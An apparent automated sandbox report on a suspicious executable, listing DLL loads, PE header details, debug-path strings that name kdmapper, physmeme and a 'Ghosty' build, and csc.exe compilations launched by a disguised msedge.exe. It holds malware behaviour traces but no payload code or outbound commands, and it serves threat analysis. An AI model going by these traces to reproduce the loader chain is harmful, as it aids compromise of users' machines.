                                Source: C:\Edge\msedge.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: sspicli.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Edge\msedge.exeSection loaded: ktmw32.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasapi32.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasman.dll
                                Source: C:\Edge\msedge.exeSection loaded: rtutils.dll
                                Source: C:\Edge\msedge.exeSection loaded: mswsock.dll
                                Source: C:\Edge\msedge.exeSection loaded: winhttp.dll
                                Source: C:\Edge\msedge.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Edge\msedge.exeSection loaded: iphlpapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Edge\msedge.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Edge\msedge.exeSection loaded: dnsapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: winnsi.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasadhlp.dll
                                Source: C:\Edge\msedge.exeSection loaded: propsys.dll
                                Source: C:\Edge\msedge.exeSection loaded: apphelp.dll
                                Source: C:\Edge\msedge.exeSection loaded: dlnashext.dll
                                Source: C:\Edge\msedge.exeSection loaded: wpdshext.dll
                                Source: C:\Edge\msedge.exeSection loaded: edputil.dll
                                Source: C:\Edge\msedge.exeSection loaded: urlmon.dll
                                Source: C:\Edge\msedge.exeSection loaded: iertutil.dll
                                Source: C:\Edge\msedge.exeSection loaded: srvcli.dll
                                Source: C:\Edge\msedge.exeSection loaded: netutils.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Edge\msedge.exeSection loaded: wintypes.dll
                                Source: C:\Edge\msedge.exeSection loaded: appresolver.dll
                                Source: C:\Edge\msedge.exeSection loaded: bcp47langs.dll
                                Source: C:\Edge\msedge.exeSection loaded: slc.dll
                                Source: C:\Edge\msedge.exeSection loaded: userenv.dll
                                Source: C:\Edge\msedge.exeSection loaded: sppc.dll
                                Source: C:\Edge\msedge.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Edge\msedge.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Edge\msedge.exeSection loaded: ktmw32.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasapi32.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasman.dll
                                Source: C:\Edge\msedge.exeSection loaded: rtutils.dll
                                Source: C:\Edge\msedge.exeSection loaded: mswsock.dll
                                Source: C:\Edge\msedge.exeSection loaded: winhttp.dll
                                Source: C:\Edge\msedge.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Edge\msedge.exeSection loaded: iphlpapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Edge\msedge.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Edge\msedge.exeSection loaded: dnsapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: winnsi.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasadhlp.dll
                                Source: C:\Edge\msedge.exeSection loaded: propsys.dll
                                Source: C:\Edge\msedge.exeSection loaded: apphelp.dll
                                Source: C:\Edge\msedge.exeSection loaded: dlnashext.dll
                                Source: C:\Edge\msedge.exeSection loaded: wpdshext.dll
                                Source: C:\Edge\msedge.exeSection loaded: edputil.dll
                                Source: C:\Edge\msedge.exeSection loaded: urlmon.dll
                                Source: C:\Edge\msedge.exeSection loaded: iertutil.dll
                                Source: C:\Edge\msedge.exeSection loaded: srvcli.dll
                                Source: C:\Edge\msedge.exeSection loaded: netutils.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Edge\msedge.exeSection loaded: wintypes.dll
                                Source: C:\Edge\msedge.exeSection loaded: appresolver.dll
                                Source: C:\Edge\msedge.exeSection loaded: bcp47langs.dll
                                Source: C:\Edge\msedge.exeSection loaded: slc.dll
                                Source: C:\Edge\msedge.exeSection loaded: userenv.dll
                                Source: C:\Edge\msedge.exeSection loaded: sppc.dll
                                Source: C:\Edge\msedge.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: NCTSgL4t0B.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: NCTSgL4t0B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: NCTSgL4t0B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: NCTSgL4t0B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: NCTSgL4t0B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: NCTSgL4t0B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: NCTSgL4t0B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: NCTSgL4t0B.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: NCTSgL4t0B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 0000000C.00000000.1306786234.0000000000E13000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.10.dr
                                Source: Binary string: ;C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.pdb source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: Release\Fcs.pdb source: curl.exe, 0000000E.00000003.1323956983.000001EBAEA64000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb66 source: NCTSgL4t0B.exe
                                Source: Binary string: ;C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.pdb source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb source: NCTSgL4t0B.exe
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 0000000E.00000003.1324416558.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1323956983.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1324507313.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325126698.000001EBAEA20000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.14.dr
                                Source: NCTSgL4t0B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: NCTSgL4t0B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: NCTSgL4t0B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: NCTSgL4t0B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: NCTSgL4t0B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"Jump to behavior
